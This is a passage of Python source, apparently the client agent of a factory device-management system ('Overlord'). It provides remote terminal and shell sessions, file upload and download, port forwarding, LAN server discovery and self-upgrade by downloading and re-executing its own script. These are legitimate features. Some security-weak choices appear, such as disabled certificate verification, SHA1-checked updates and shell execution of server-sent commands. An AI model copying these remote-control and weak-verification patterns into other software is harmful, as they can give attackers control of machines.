self._mode = mode
self._machine_id = self.GetMachineID()
self._session_id = sid if sid is not None else str(uuid.uuid4())
self._terminal_session_id = terminal_sid
self._ttyname_to_sid = {}
self._terminal_sid_to_pid = {}
self._prop_file = prop_file
self._properties = {}
self._register_status = DISCONNECTED
self._reset = threading.Event()
self._tls_mode = tls_mode
self._ovl_path = ovl_path
self._certificate_dir = certificate_dir
# The information of track_connection is lost after ghost restart.
self._track_connection = None
self._track_connection_timeout_secs = 900
# RPC
self._requests = {}
self._queue = queue.Queue()
# Protocol specific
self._last_ping = 0
self._tty_device = tty_device
self._shell_command = command
self._file_op = file_op
self._download_queue = queue.Queue()
self._port = port
def SetIgnoreChild(self, status):
# Only ignore child for Agent since only it could spawn child Ghost.
if self._mode == Ghost.AGENT:
signal.signal(signal.SIGCHLD,
signal.SIG_IGN if status else signal.SIG_DFL)
def GetFileSha1(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha1(f.read()).hexdigest()
def TLSEnabled(self, host, port):
"""Determine if TLS is enabled on given server address."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Allow any certificate since we only want to check if server talks TLS.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
context.verify_mode = ssl.CERT_NONE
sock = context.wrap_socket(sock, server_hostname=host)
sock.settimeout(_CONNECT_TIMEOUT)
sock.connect((host, port))
return True
except ssl.SSLError:
return False
except socket.timeout:
return False
except socket.error: # Connect refused or timeout
raise
except Exception:
return False # For whatever reason above failed, assume False
def Upgrade(self):
logging.info('Upgrade: initiating upgrade sequence...')
try:
https_enabled = self.TLSEnabled(self._connected_addr[0],
_OVERLORD_HTTP_PORT)
except socket.error:
logging.error('Upgrade: failed to connect to Overlord HTTP server, '
'abort')
return
if self._tls_settings.Enabled() and not https_enabled:
logging.error('Upgrade: TLS enforced but found Overlord HTTP server '
'without TLS enabled! Possible mis-configuration or '
'DNS/IP spoofing detected, abort')
return
scriptpath = os.path.abspath(sys.argv[0])
url = 'http%s://%s:%d/upgrade/ghost.py' % (
's' if https_enabled else '', self._connected_addr[0],
_OVERLORD_HTTP_PORT)
# Download sha1sum for ghost.py for verification
try:
with contextlib.closing(
urllib.request.urlopen(url + '.sha1', timeout=_CONNECT_TIMEOUT,
context=self._tls_settings.Context())) as f:
if f.getcode() != 200:
raise RuntimeError('HTTP status %d' % f.getcode())
sha1sum = f.read().strip()
except (ssl.SSLError, ssl.CertificateError) as e:
logging.error('Upgrade: %s: %s', e.__class__.__name__, e)
return
except Exception:
logging.error('Upgrade: failed to download sha1sum file, abort')
return
if self.GetFileSha1(scriptpath) == sha1sum:
logging.info('Upgrade: ghost is already up-to-date, skipping upgrade')
return
# Download upgrade version of ghost.py
try:
with contextlib.closing(
urllib.request.urlopen(url, timeout=_CONNECT_TIMEOUT,
context=self._tls_settings.Context())) as f:
if f.getcode() != 200:
raise RuntimeError('HTTP status %d' % f.getcode())
data = f.read()
except (ssl.SSLError, ssl.CertificateError) as e:
logging.error('Upgrade: %s: %s', e.__class__.__name__, e)
return
except Exception:
logging.error('Upgrade: failed to download upgrade, abort')
return
# Compare SHA1 sum
if hashlib.sha1(data).hexdigest() != sha1sum:
logging.error('Upgrade: sha1sum mismatch, abort')
return
try:
with open(scriptpath, 'wb') as f:
f.write(data)
except Exception:
logging.error('Upgrade: failed to write upgrade onto disk, abort')
return
logging.info('Upgrade: restarting ghost...')
self.CloseSockets()
self.SetIgnoreChild(False)
os.execve(scriptpath, [scriptpath] + sys.argv[1:], os.environ)
def LoadProperties(self):
try:
if self._prop_file:
with open(self._prop_file, 'r') as f:
self._properties = json.loads(f.read())
if self._ovl_path:
self._properties['ovl_path'] = self._ovl_path
if self._certificate_dir:
self._properties['certificate_dir'] = self._certificate_dir
except Exception as e:
logging.error('LoadProperties: %s', e)
def CloseSockets(self):
# Close sockets opened by parent process, since we don't use it anymore.
if self._platform == 'Linux':
for fd in os.listdir('/proc/self/fd/'):
try:
real_fd = os.readlink('/proc/self/fd/%s' % fd)
if real_fd.startswith('socket'):
os.close(int(fd))
except Exception:
pass
def SpawnGhost(self, mode, sid=None, terminal_sid=None, tty_device=None,
command=None, file_op=None, port=None):
"""Spawn a child ghost with specific mode.
Returns:
The spawned child process pid.
"""
# Restore the default signal handler, so our child won't have problems.
self.SetIgnoreChild(False)
pid = os.fork()
if pid == 0:
self.CloseSockets()
g = Ghost([self._connected_addr], tls_settings=self._tls_settings,
mode=mode, mid=Ghost.RANDOM_MID, sid=sid,
terminal_sid=terminal_sid, tty_device=tty_device,
command=command, file_op=file_op, port=port)
g.Start()
sys.exit(0)
else:
self.SetIgnoreChild(True)
return pid
def Timestamp(self):
return int(time.time())
def GetGateWayIP(self):
if self._platform == 'Darwin':
output = process_utils.CheckOutput(['route', '-n', 'get', 'default'])
ret = re.search('gateway: (.*)', output)
if ret:
return [ret.group(1)]
return []
if self._platform == 'Linux':
with open('/proc/net/route', 'r') as f:
lines = f.readlines()
ips = []
for line in lines:
parts = line.split('\t')
if parts[2] == '00000000':
continue
try:
h = codecs.decode(parts[2], 'hex')
ips.append('.'.join([str(x) for x in reversed(h)]))
except (TypeError, binascii.Error):
pass
return ips
logging.warning('GetGateWayIP: unsupported platform')
return []
def GetFactoryServerIP(self):
try:
from cros.factory.test import server_proxy
url = server_proxy.GetServerURL()
match = re.match(r'^https?://(.*):.*$', url)
if match:
return [match.group(1)]
except Exception:
pass
return []
def GetMachineID(self):
"""Generates machine-dependent ID string for a machine.
There are many ways to generate a machine ID:
Linux:
1. factory device_id
2. /sys/class/dmi/id/product_uuid (only available on intel machines)
3. MAC address
We follow the listed order to generate machine ID, and fallback to the
next alternative if the previous doesn't work.
Darwin:
All Darwin system should have the IOPlatformSerialNumber attribute.
"""
if self._mid == Ghost.RANDOM_MID:
return str(uuid.uuid4())
if self._mid:
return self._mid
# Darwin
if self._platform == 'Darwin':
output = process_utils.CheckOutput(['ioreg', '-rd1', '-c',
'IOPlatformExpertDevice'])
ret = re.search('"IOPlatformSerialNumber" = "(.*)"', output)
if ret:
return ret.group(1)
# Try factory device id
try:
from cros.factory.test import session
return session.GetDeviceID()
except Exception:
pass
# Try DMI product UUID
try:
with open('/sys/class/dmi/id/product_uuid', 'r') as f:
return f.read().strip()
except Exception:
pass
# Use MAC address if non is available
try:
macs = []
ifaces = sorted(os.listdir('/sys/class/net'))
for iface in ifaces:
if iface == 'lo':
continue
with open('/sys/class/net/%s/address' % iface, 'r') as f:
macs.append(f.read().strip())
return ';'.join(macs)
except Exception:
pass
raise RuntimeError("can't generate machine ID")
def GetProcessWorkingDirectory(self, pid):
if self._platform == 'Linux':
return os.readlink('/proc/%d/cwd' % pid)
if self._platform == 'Darwin':
PROC_PIDVNODEPATHINFO = 9
proc_vnodepathinfo_size = 2352
vid_path_offset = 152
proc = ctypes.cdll.LoadLibrary(ctypes.util.find_library('libproc'))
buf = ctypes.create_string_buffer('\0' * proc_vnodepathinfo_size)
proc.proc_pidinfo(pid, PROC_PIDVNODEPATHINFO, 0,
ctypes.byref(buf), proc_vnodepathinfo_size)
buf = buf.raw[vid_path_offset:]
n = buf.index('\0')
return buf[:n]
raise RuntimeError('GetProcessWorkingDirectory: unsupported platform')
def Reset(self):
"""Reset state and clear request handlers."""
if self._sock is not None:
self._sock.Close()
self._sock = None
self._reset.clear()
self._last_ping = 0
self._requests = {}
self.LoadProperties()
self._register_status = DISCONNECTED
def SendMessage(self, msg):
"""Serialize the message and send it through the socket."""
self._sock.Send(json.dumps(msg).encode('utf-8') + _SEPARATOR)
def SendRequest(self, name, args, handler=None,
timeout=_REQUEST_TIMEOUT_SECS):
if handler and not callable(handler):
raise RequestError('Invalid request handler for msg "%s"' % name)
rid = str(uuid.uuid4())
msg = {'rid': rid, 'timeout': timeout, 'name': name, 'params': args}
if timeout >= 0:
self._requests[rid] = [self.Timestamp(), timeout, handler]
self.SendMessage(msg)
def SendResponse(self, omsg, status, params=None):
msg = {'rid': omsg['rid'], 'response': status, 'params': params}
self.SendMessage(msg)
def HandleTTYControl(self, fd, control_str):
msg = json.loads(control_str)
command = msg['command']
params = msg['params']
if command == 'resize':
# some error happened on websocket
if len(params) != 2:
return
winsize = struct.pack('HHHH', params[0], params[1], 0, 0)
fcntl.ioctl(fd, termios.TIOCSWINSZ, winsize)
else:
logging.warning('Invalid request command "%s"', command)
def SpawnTTYServer(self, unused_var):
"""Spawn a TTY server and forward I/O to the TCP socket."""
logging.info('SpawnTTYServer: started')
try:
if self._tty_device is None:
pid, fd = os.forkpty()
if pid == 0:
ttyname = os.ttyname(sys.stdout.fileno())
try:
server = GhostRPCServer()
server.RegisterTTY(self._session_id, ttyname)
server.RegisterSession(self._session_id, os.getpid())
except Exception:
# If ghost is launched without RPC server, the call will fail but we
# can ignore it.
pass
# The directory that contains the current running ghost script
script_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
env = os.environ.copy()
env['USER'] = os.getenv('USER', 'root')
env['HOME'] = os.getenv('HOME', '/root')
env['PATH'] = os.getenv('PATH') + ':%s' % script_dir
os.chdir(env['HOME'])
os.execve(_SHELL, [_SHELL], env)
else:
fd = os.open(self._tty_device, os.O_RDWR)
tty.setraw(fd)
# 0: iflag
# 1: oflag
# 2: cflag
# 3: lflag
# 4: ispeed
# 5: ospeed
# 6: cc
attr = termios.tcgetattr(fd)
attr[0] &= (termios.IXON | termios.IXOFF)
attr[2] |= termios.CLOCAL
attr[2] &= ~termios.CRTSCTS
attr[4] = termios.B115200
attr[5] = termios.B115200
termios.tcsetattr(fd, termios.TCSANOW, attr)
nonlocals = {
'control_state': None,
'control_str': b''
}
def _ProcessBuffer(buf):
write_buffer = b''
while buf:
if nonlocals['control_state']:
if _CONTROL_END in buf:
index = buf.index(_CONTROL_END)
nonlocals['control_str'] += buf[:index]
self.HandleTTYControl(fd, nonlocals['control_str'])
nonlocals['control_state'] = None
nonlocals['control_str'] = b''
buf = buf[index+1:]
else:
nonlocals['control_str'] += buf
buf = b''
else:
if _CONTROL_START in buf:
nonlocals['control_state'] = _CONTROL_START
index = buf.index(_CONTROL_START)
write_buffer += buf[:index]
buf = buf[index+1:]
else:
write_buffer += buf
buf = b''
if write_buffer:
os.write(fd, write_buffer)
_ProcessBuffer(self._sock.RecvBuf())
while True:
rd, unused_wd, unused_xd = select.select([self._sock, fd], [], [])
if fd in rd:
self._sock.Send(os.read(fd, _BUFSIZE))
if self._sock in rd:
buf = self._sock.Recv(_BUFSIZE)
if not buf:
raise RuntimeError('connection terminated')
_ProcessBuffer(buf)
except Exception as e:
logging.error('SpawnTTYServer: %s', e, exc_info=True)
finally:
self._sock.Close()
logging.info('SpawnTTYServer: terminated')
os._exit(0) # pylint: disable=protected-access
def SpawnShellServer(self, unused_var):
"""Spawn a shell server and forward input/output from/to the TCP socket."""
logging.info('SpawnShellServer: started')
# Add ghost executable to PATH
script_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
env = os.environ.copy()
env['PATH'] = '%s:%s' % (script_dir, os.getenv('PATH'))
# Execute shell command from HOME directory
os.chdir(os.getenv('HOME', '/tmp'))
p = subprocess.Popen(self._shell_command, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=True, env=env)
def make_non_block(fd):
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
make_non_block(p.stdout)
make_non_block(p.stderr)
try:
p.stdin.write(self._sock.RecvBuf())
while True:
rd, unused_wd, unused_xd = select.select(
[p.stdout, p.stderr, self._sock], [], [])
if p.stdout in rd:
self._sock.Send(p.stdout.read(_BUFSIZE))
if p.stderr in rd:
self._sock.Send(p.stderr.read(_BUFSIZE))
if self._sock in rd:
ret = self._sock.Recv(_BUFSIZE)
if not ret:
raise RuntimeError('connection terminated')
try:
idx = ret.index(_STDIN_CLOSED * 2)
p.stdin.write(ret[:idx])
p.stdin.close()
except ValueError:
p.stdin.write(ret)
p.poll()
if p.returncode is not None:
break
except Exception as e:
logging.error('SpawnShellServer: %s', e, exc_info=True)
finally:
# Check if the process is terminated. If not, Send SIGTERM to process,
# then wait for 1 second. Send another SIGKILL to make sure the process is
# terminated.
p.poll()
if p.returncode is None:
try:
p.terminate()
time.sleep(1)
p.kill()
except Exception:
pass
p.wait()
self._sock.Close()
logging.info('SpawnShellServer: terminated')
os._exit(0) # pylint: disable=protected-access
def InitiateFileOperation(self, unused_var):
if self._file_op[0] == 'download':
try:
size = os.stat(self._file_op[1]).st_size
except OSError as e:
logging.error('InitiateFileOperation: download: %s', e)
sys.exit(1)
self.SendRequest('request_to_download',
{'terminal_sid': self._terminal_session_id,
'filename': os.path.basename(self._file_op[1]),
'size': size})
elif self._file_op[0] == 'upload':
self.SendRequest('clear_to_upload', {}, timeout=-1)
self.StartUploadServer()
else:
logging.error('InitiateFileOperation: unknown file operation, ignored')
def StartDownloadServer(self):
logging.info('StartDownloadServer: started')
try:
with open(self._file_op[1], 'rb') as f:
while True:
data = f.read(_BLOCK_SIZE)
if not data:
break
self._sock.Send(data)
except Exception as e:
logging.error('StartDownloadServer: %s', e)
finally:
self._sock.Close()
logging.info('StartDownloadServer: terminated')
os._exit(0) # pylint: disable=protected-access
def StartUploadServer(self):
logging.info('StartUploadServer: started')
try:
filepath = self._file_op[1]
dirname = os.path.dirname(filepath)
if not os.path.exists(dirname):
try:
os.makedirs(dirname)
except Exception:
pass
with open(filepath, 'wb') as f:
if self._file_op[2]:
os.fchmod(f.fileno(), self._file_op[2])
f.write(self._sock.RecvBuf())
while True:
rd, unused_wd, unused_xd = select.select([self._sock], [], [])
if self._sock in rd:
buf = self._sock.Recv(_BLOCK_SIZE)
if not buf:
break
f.write(buf)
except socket.error as e:
logging.error('StartUploadServer: socket error: %s', e)
except Exception as e:
logging.error('StartUploadServer: %s', e)
finally:
self._sock.Close()
logging.info('StartUploadServer: terminated')
os._exit(0) # pylint: disable=protected-access
def SpawnPortForwardServer(self, unused_var):
"""Spawn a port forwarding server and forward I/O to the TCP socket."""
logging.info('SpawnPortForwardServer: started')
src_sock = None
try:
src_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
src_sock.settimeout(_CONNECT_TIMEOUT)
src_sock.connect(('localhost', self._port))
src_sock.send(self._sock.RecvBuf())
while True:
rd, unused_wd, unused_xd = select.select([self._sock, src_sock], [], [])
if self._sock in rd:
data = self._sock.Recv(_BUFSIZE)
if not data:
raise RuntimeError('connection terminated')
src_sock.send(data)
if src_sock in rd:
data = src_sock.recv(_BUFSIZE)
if not data:
continue
self._sock.Send(data)
except Exception as e:
logging.error('SpawnPortForwardServer: %s', e)
finally:
if src_sock:
src_sock.close()
self._sock.Close()
logging.info('SpawnPortForwardServer: terminated')
os._exit(0) # pylint: disable=protected-access
def Ping(self):
def timeout_handler(x):
if x is None:
raise PingTimeoutError
self._last_ping = self.Timestamp()
self.SendRequest('ping', {}, timeout_handler, 5)
def HandleFileDownloadRequest(self, msg):
params = msg['params']
filepath = params['filename']
if not os.path.isabs(filepath):
filepath = os.path.join(os.getenv('HOME', '/tmp'), filepath)
try:
with open(filepath, 'r') as _:
pass
except Exception as e:
self.SendResponse(msg, str(e))
return
self.SpawnGhost(self.FILE, params['sid'],
file_op=('download', filepath))
self.SendResponse(msg, SUCCESS)
def HandleFileUploadRequest(self, msg):
params = msg['params']
# Resolve upload filepath
filename = params['filename']
dest_path = filename
# If dest is specified, use it first
dest_path = params.get('dest', '')
if dest_path:
if not os.path.isabs(dest_path):
dest_path = os.path.join(os.getenv('HOME', '/tmp'), dest_path)
if os.path.isdir(dest_path):
dest_path = os.path.join(dest_path, filename)
else:
target_dir = os.getenv('HOME', '/tmp')
# Terminal session ID found, upload to it's current working directory
if 'terminal_sid' in params:
pid = self._terminal_sid_to_pid.get(params['terminal_sid'], None)
if pid:
try:
target_dir = self.GetProcessWorkingDirectory(pid)
except Exception as e:
logging.error(e)
dest_path = os.path.join(target_dir, filename)
try:
os.makedirs(os.path.dirname(dest_path))
except Exception:
pass
try:
with open(dest_path, 'w') as _:
pass
except Exception as e:
self.SendResponse(msg, str(e))
return
# If not check_only, spawn FILE mode ghost agent to handle upload
if not params.get('check_only', False):
self.SpawnGhost(self.FILE, params['sid'],
file_op=('upload', dest_path, params.get('perm', None)))
self.SendResponse(msg, SUCCESS)
def HandleRequest(self, msg):
command = msg['name']
params = msg['params']
if command == 'upgrade':
self.Upgrade()
elif command == 'terminal':
self.SpawnGhost(self.TERMINAL, params['sid'],
tty_device=params['tty_device'])
self.SendResponse(msg, SUCCESS)
elif command == 'shell':
self.SpawnGhost(self.SHELL, params['sid'], command=params['command'])
self.SendResponse(msg, SUCCESS)
elif command == 'file_download':
self.HandleFileDownloadRequest(msg)
elif command == 'clear_to_download':
self.StartDownloadServer()
elif command == 'file_upload':
self.HandleFileUploadRequest(msg)
elif command == 'forward':
self.SpawnGhost(self.FORWARD, params['sid'], port=params['port'])
self.SendResponse(msg, SUCCESS)
def HandleResponse(self, response):
rid = str(response['rid'])
if rid in self._requests:
handler = self._requests[rid][2]
del self._requests[rid]
if callable(handler):
handler(response)
else:
logging.warning('Received unsolicited response, ignored')
def ParseMessage(self, buf, single=True):
if single:
try:
index = buf.index(_SEPARATOR)
except ValueError:
self._sock.UnRecv(buf)
return
msgs_json = [buf[:index]]
self._sock.UnRecv(buf[index + 2:])
else:
msgs_json = buf.split(_SEPARATOR)
self._sock.UnRecv(msgs_json.pop())
for msg_json in msgs_json:
try:
msg = json.loads(msg_json)
except ValueError:
# Ignore mal-formed message.
logging.error('mal-formed JSON request, ignored')
continue
if 'name' in msg:
self.HandleRequest(msg)
elif 'response' in msg:
self.HandleResponse(msg)
else: # Ingnore mal-formed message.
logging.error('mal-formed JSON request, ignored')
def ScanForTimeoutRequests(self):
"""Scans for pending requests which have timed out.
If any timed-out requests are discovered, their handler is called with the
special response value of None.
"""
for rid in list(self._requests):
request_time, timeout, handler = self._requests[rid]
if self.Timestamp() - request_time > timeout:
if callable(handler):
handler(None)
else:
logging.error('Request %s timeout', rid)
del self._requests[rid]
def InitiateDownload(self):
ttyname, filename = self._download_queue.get()
sid = self._ttyname_to_sid[ttyname]
self.SpawnGhost(self.FILE, terminal_sid=sid,
file_op=('download', filename))
def Listen(self):
try:
while True:
rds, unused_wd, unused_xd = select.select([self._sock], [], [],
_PING_INTERVAL // 2)
if self._sock in rds:
data = self._sock.Recv(_BUFSIZE)
# Socket is closed
if not data:
break
self.ParseMessage(data, self._register_status != SUCCESS)
if (self._mode == self.AGENT and
self.Timestamp() - self._last_ping > _PING_INTERVAL):
self.Ping()
self.ScanForTimeoutRequests()
if not self._download_queue.empty():
self.InitiateDownload()
if self._reset.is_set():
break
except socket.error:
raise RuntimeError('Connection dropped')
except PingTimeoutError:
raise RuntimeError('Connection timeout')
finally:
self.Reset()
self._queue.put('resume')
if self._mode != Ghost.AGENT:
sys.exit(1)
def Register(self):
non_local = {}
for addr in self._overlord_addrs:
non_local['addr'] = addr
def registered(response):
if response is None:
self._reset.set()
raise RuntimeError('Register request timeout')
self._register_status = response['response']
if response['response'] != SUCCESS:
self._reset.set()
raise RuntimeError('Register: ' + response['response'])
logging.info('Registered with Overlord at %s:%d', *non_local['addr'])
self._connected_addr = non_local['addr']
self.Upgrade() # Check for upgrade
self._queue.put('pause', True)
try:
logging.info('Trying %s:%d ...', *addr)
self.Reset()
# Check if server has TLS enabled. Only check if self._tls_mode is
# None.
# Only control channel needs to determine if TLS is enabled. Other mode
# should use the TLSSettings passed in when it was spawned.
if self._mode == Ghost.AGENT:
self._tls_settings.SetEnabled(
self.TLSEnabled(*addr) if self._tls_mode is None
else self._tls_mode)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(_CONNECT_TIMEOUT)
try:
if self._tls_settings.Enabled():
tls_context = self._tls_settings.Context()
sock = tls_context.wrap_socket(sock, server_hostname=addr[0])
sock.connect(addr)
except (ssl.SSLError, ssl.CertificateError) as e:
logging.error('%s: %s', e.__class__.__name__, e)
continue
except IOError as e:
if e.errno == 2: # No such file or directory
logging.error('%s: %s', e.__class__.__name__, e)
continue
raise
self._sock = BufferedSocket(sock)
logging.info('Connection established, registering...')
handler = {
Ghost.AGENT: registered,
Ghost.TERMINAL: self.SpawnTTYServer,
Ghost.SHELL: self.SpawnShellServer,
Ghost.FILE: self.InitiateFileOperation,
Ghost.FORWARD: self.SpawnPortForwardServer,
}[self._mode]
# Machine ID may change if MAC address is used (USB-ethernet dongle
# plugged/unplugged)
self._machine_id = self.GetMachineID()
self.SendRequest('register',
{'mode': self._mode, 'mid': self._machine_id,
'sid': self._session_id,
'properties': self._properties}, handler)
except socket.error:
pass
else:
# We only send dut data when it's agent mode.
if self._mode == Ghost.AGENT:
self.SendData()
if self._track_connection is not None:
self.TrackConnection(self._track_connection,
self._track_connection_timeout_secs)
sock.settimeout(None)
self.Listen()
raise RuntimeError('Cannot connect to any server')
def Reconnect(self):
logging.info('Received reconnect request from RPC server, reconnecting...')
self._reset.set()
def CollectPytestAndStatus(self):
STATUS = Enum(['failed', 'running', 'idle'])
goofy = state.GetInstance()
tests = goofy.GetTests()
# Ignore parents
tests = [x for x in tests if not x.get('parent')]
scheduled_tests = (
goofy.GetTestRunStatus(None).get('scheduled_tests') or [])
scheduled_tests = {t['path']
for t in scheduled_tests}
tests = [x for x in tests if x['path'] in scheduled_tests]
data = {
'pytest': '',
'status': STATUS.idle
}
def parse_pytest_name(test):
# test['path'] format: 'test_list_name:pytest_name'
return test['path'][test['path'].index(':') + 1:]
for test in filter(lambda t: t['status'] == TestState.ACTIVE, tests):
data['pytest'] = parse_pytest_name(test)
data['status'] = STATUS.running
return data
for test in filter(lambda t: t['status'] == TestState.FAILED, tests):
data['pytest'] = parse_pytest_name(test)
data['status'] = STATUS.failed
return data
if tests:
data['pytest'] = parse_pytest_name(tests[0])
return data
def CollectModelName(self):
return {
'model': cros_config_module.CrosConfig().GetModelName()
}
def CollectIP(self):
ip_addrs = []
for interface in net_utils.GetNetworkInterfaces():
ip = net_utils.GetEthernetIp(interface)[0]
if ip:
ip_addrs.append(ip)
return {
'ip': ip_addrs
}
def CollectSerial(self):
return {
'serial': device_data.GetSerialNumber()
}
def CollectData(self):
"""Collect dut data.
Data includes:
1. status: Current test status
2. pytest: Current pytest
3. model: Model name
4. ip: IP
5. serial: Serial number
"""
data = {}
data.update(self.CollectPytestAndStatus())
data.update(self.CollectModelName())
data.update(self.CollectIP())
data.update(self.CollectSerial())
return data
def SendData(self):
if not sys_utils.InCrOSDevice():
return
data = self.CollectData()
logging.info('data = %s', data)
self.SendRequest('update_dut_data', data)
def TrackConnection(self, enabled, timeout_secs):
logging.info('TrackConnection, enabled = %s, timeout_secs = %d', enabled,
timeout_secs)
self._track_connection = enabled
self._track_connection_timeout_secs = timeout_secs
self.SendRequest('track_connection', {
'enabled': enabled,
'timeout_secs': timeout_secs
})
def GetStatus(self):
status = self._register_status
if self._register_status == SUCCESS:
ip, port = self._sock.sock.getpeername()
status += ' %s:%d' % (ip, port)
return status
def AddToDownloadQueue(self, ttyname, filename):
self._download_queue.put((ttyname, filename))
def RegisterTTY(self, session_id, ttyname):
self._ttyname_to_sid[ttyname] = session_id
def RegisterSession(self, session_id, process_id):
self._terminal_sid_to_pid[session_id] = process_id
def StartLanDiscovery(self):
"""Start to listen to LAN discovery packet at
_OVERLORD_LAN_DISCOVERY_PORT."""
def thread_func():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
try:
s.bind(('0.0.0.0', _OVERLORD_LAN_DISCOVERY_PORT))
except socket.error as e:
logging.error('LAN discovery: %s, abort', e)
return
logging.info('LAN Discovery: started')
while True:
rd, unused_wd, unused_xd = select.select([s], [], [], 1)
if s in rd:
data, source_addr = s.recvfrom(_BUFSIZE)
parts = data.split()
if parts[0] == 'OVERLORD':
ip, port = parts[1].split(':')
if not ip:
ip = source_addr[0]
self._queue.put((ip, int(port)), True)
try:
obj = self._queue.get(False)
except queue.Empty:
pass
else:
if not isinstance(obj, str):
self._queue.put(obj)
elif obj == 'pause':
logging.info('LAN Discovery: paused')
while obj != 'resume':
obj = self._queue.get(True)
logging.info('LAN Discovery: resumed')
t = threading.Thread(target=thread_func)
t.daemon = True
t.start()
def StartRPCServer(self):
logging.info('RPC Server: started')
rpc_server = SimpleJSONRPCServer((_DEFAULT_BIND_ADDRESS, _GHOST_RPC_PORT),
logRequests=False)
rpc_server.register_function(self.SendData, 'SendData')
rpc_server.register_function(self.Reconnect, 'Reconnect')
rpc_server.register_function(self.GetStatus, 'GetStatus')
rpc_server.register_function(self.RegisterTTY, 'RegisterTTY')
rpc_server.register_function(self.RegisterSession, 'RegisterSession')
rpc_server.register_function(self.TrackConnection, 'TrackConnection')
rpc_server.register_function(self.AddToDownloadQueue, 'AddToDownloadQueue')
t = threading.Thread(target=rpc_server.serve_forever)
t.daemon = True
t.start()
def ApplyTestListParams(self):
mgr = manager.Manager()
device = sys_interface.SystemInterface()
constants = mgr.GetTestListByID(mgr.GetActiveTestListId(device)).constants
if 'overlord' not in constants:
return
if 'overlord_urls' in constants['overlord']:
for addr in [(x, _OVERLORD_PORT) for x in
constants['overlord']['overlord_urls']]:
if addr not in self._overlord_addrs:
self._overlord_addrs.append(addr)
# This is sugar for ODM to turn off the verification quickly if they forgot.
# So we don't support to turn on again.
# If we want to turn on, we need to restart the ghost daemon.
if 'tls_no_verify' in constants['overlord']:
if constants['overlord']['tls_no_verify']:
self._tls_settings = TLSSettings(None, False)
def ScanServer(self):
for meth in [self.GetGateWayIP, self.GetFactoryServerIP]:
for addr in [(x, _OVERLORD_PORT) for x in meth()]:
if addr not in self._overlord_addrs:
self._overlord_addrs.append(addr)
def Start(self, lan_disc=False, rpc_server=False):
logging.info('%s started', self.MODE_NAME[self._mode])
logging.info('MID: %s', self._machine_id)
logging.info('SID: %s', self._session_id)
# We don't care about child process's return code, not wait is needed. This
# is used to prevent zombie process from lingering in the system.
self.SetIgnoreChild(True)
if lan_disc:
self.StartLanDiscovery()
if rpc_server:
self.StartRPCServer()
try:
while True:
try:
addr = self._queue.get(False)
except queue.Empty:
pass
else:
if isinstance(addr, tuple) and addr not in self._overlord_addrs:
logging.info('LAN Discovery: got overlord address %s:%d', *addr)
self._overlord_addrs.append(addr)
if self._mode == Ghost.AGENT:
self.ApplyTestListParams()
try:
self.ScanServer()
self.Register()
# Don't show stack trace for RuntimeError, which we use in this file for
# plausible and expected errors (such as can't connect to server).
except RuntimeError as e:
logging.info('%s, retrying in %ds', str(e), _RETRY_INTERVAL)
time.sleep(_RETRY_INTERVAL)
except Exception as e:
unused_x, unused_y, exc_traceback = sys.exc_info()
traceback.print_tb(exc_traceback)
logging.info('%s: %s, retrying in %ds',
e.__class__.__name__, str(e), _RETRY_INTERVAL)
time.sleep(_RETRY_INTERVAL)
self.Reset()
except KeyboardInterrupt:
logging.error('Received keyboard interrupt, quit')
sys.exit(0)
def GhostRPCServer():
"""Returns handler to Ghost's JSON RPC server."""
return jsonrpclib.Server('http://localhost:%d' % _GHOST_RPC_PORT)
def ForkToBackground():
"""Fork process to run in background."""
pid = os.fork()
if pid != 0:
logging.info('Ghost(%d) running in background.', pid)
sys.exit(0)
def DownloadFile(filename):
"""Initiate a client-initiated file download."""
filepath = os.path.abspath(filename)
if not os.path.exists(filepath):
logging.error('file `%s\' does not exist', filename)
sys.exit(1)
# Check if we actually have permission to read the file
if not os.access(filepath, os.R_OK):
logging.error('can not open %s for reading', filepath)
sys.exit(1)
server = GhostRPCServer()
server.AddToDownloadQueue(os.ttyname(0), filepath)
sys.exit(0)
def main():
# Setup logging format
logger = logging.getLogger()
logger.setLevel(logging.INFO)
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(message)s', '%Y/%m/%d %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
parser = argparse.ArgumentParser()
parser.add_argument('--fork', dest='fork', action='store_true', default=False,
help='fork procecess to run in background')
parser.add_argument('--mid', metavar='MID', dest='mid', action='store',
default=None, help='use MID as machine ID')
parser.add_argument('--rand-mid', dest='mid', action='store_const',
const=Ghost.RANDOM_MID, help='use random machine ID')
parser.add_argument('--no-lan-disc', dest='lan_disc', action='store_false',
default=True, help='disable LAN discovery')
parser.add_argument('--no-rpc-server', dest='rpc_server',
action='store_false', default=True,
help='disable RPC server')
parser.add_argument('--tls', dest='tls_mode', default='detect',
choices=('y', 'n', 'detect'),
help="specify 'y' or 'n' to force enable/disable TLS")
parser.add_argument(
'--tls-cert-file', metavar='TLS_CERT_FILE', dest='tls_cert_file',
type=str, default=None,
help='file containing the server TLS certificate in PEM '
'format')
parser.add_argument('--tls-no-verify', dest='tls_no_verify',
action='store_true', default=False,
help='do not verify certificate if TLS is enabled')
parser.add_argument(
'--prop-file', metavar='PROP_FILE', dest='prop_file', type=str,
default=None, help='file containing the JSON representation of client '
'properties')
parser.add_argument('--ovl-path', metavar='OVL_PATH', dest='ovl_path',
type=str, default=None, help='path to ovl tool')
parser.add_argument('--certificate-dir', metavar='CERTIFICATE_DIR',
dest='certificate_dir', type=str, default=None,
help='path to overlord certificate directory')
parser.add_argument('--download', metavar='FILE', dest='download', type=str,
default=None, help='file to download')
parser.add_argument('--reset', dest='reset', default=False,
action='store_true',
help='reset ghost and reload all configs')
parser.add_argument('--send-data', dest='send_data', default=False,
action='store_true',
help='send client data to overlord server')
parser.add_argument('--status', dest='status', default=False,
action='store_true',
help='show status of the client')
